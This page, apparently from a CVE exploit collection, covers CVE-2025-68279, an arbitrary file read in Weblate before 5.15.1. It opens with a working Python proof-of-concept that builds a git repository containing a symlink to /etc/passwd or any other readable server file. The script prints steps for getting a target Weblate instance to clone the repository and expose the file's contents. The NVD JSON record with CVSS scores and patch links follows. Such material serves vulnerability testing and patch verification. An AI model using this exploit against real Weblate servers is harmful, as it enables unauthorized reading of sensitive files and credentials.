CVE-2025-68279

#!/usr/bin/env python3 """ CVE-2025-68279 PoC: Weblate Arbitrary File Read via Symlink This PoC demonstrates creating a malicious repository with symlink to read arbitrary files. """ import os import subprocess import tempfile def create_malicious_repo(target_file, output_dir): """ Create a Git repository with a symlink pointing to target_file. Args: target_file: The file on the server we want to read (e.g., '/etc/passwd') output_dir: Directory to create the malicious repository """ os.makedirs(output_dir, exist_ok=True) os.chdir(output_dir) # Initialize git repo subprocess.run(['git', 'init'], check=True, capture_output=True) subprocess.run(['git', 'config', 'user.email', '[email protected]'], check=True, capture_output=True) subprocess.run(['git', 'config', 'user.name', 'Attacker'], check=True, capture_output=True) # Create symlink to target file # In a real attack, this would be pushed to a repository the target Weblate instance processes symlink_path = os.path.join(output_dir, 'readme.txt') if os.path.exists(symlink_path): os.remove(symlink_path) try: os.symlink(target_file, symlink_path) print(f'[+] Created symlink: {symlink_path} -> {target_file}') except OSError as e: print(f'[-] Failed to create symlink: {e}') return False # Add and commit subprocess.run(['git', 'add', '.'], check=True, capture_output=True) subprocess.run(['git', 'commit', '-m', 'Add symlink to sensitive file'], check=True, capture_output=True) print(f'[+] Malicious repository created in: {output_dir}') print(f'[+] Target file: {target_file}') print(f'[+] After Weblate processes this repo, check the file content in the Weblate interface') return True def main(): # Configuration target_file = '/etc/passwd' # Can be changed to any file readable by Weblate process output_dir = tempfile.mkdtemp(prefix='cve_2025_68279_') print('=' * 60) print('CVE-2025-68279 PoC: Weblate Arbitrary File Read') print('=' * 60) # Create malicious repository success = create_malicious_repo(target_file, output_dir) if success: print('\n[*] Next steps for exploitation:') print(f' 1. Push the repository in {output_dir} to a Git hosting service') print(' 2. Add this repository to target Weblate instance') print(' 3. Trigger repository update/pull in Weblate') print(' 4. View the file content through Weblate\'s file browser or translation interface') print('\n[*] Note: This PoC creates the symlink locally.') print(' In real attack, the symlink is pushed to remote repo Weblate will clone.') return 0 if success else 1 if __name__ == '__main__': exit(main())

{"cve": {"id": "CVE-2025-68279", "sourceIdentifier": "[email protected]", "published": "2025-12-18T23:15:48.863", "lastModified": "2026-01-02T16:33:54.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.15.1", "matchCriteriaId": "D694E7D3-F4E0-44F5-B2EE-9B6EDDA4607F"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/weblate/pull/17331", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/WeblateOrg/weblate/pull/17356", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-g925-f788-4jh7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}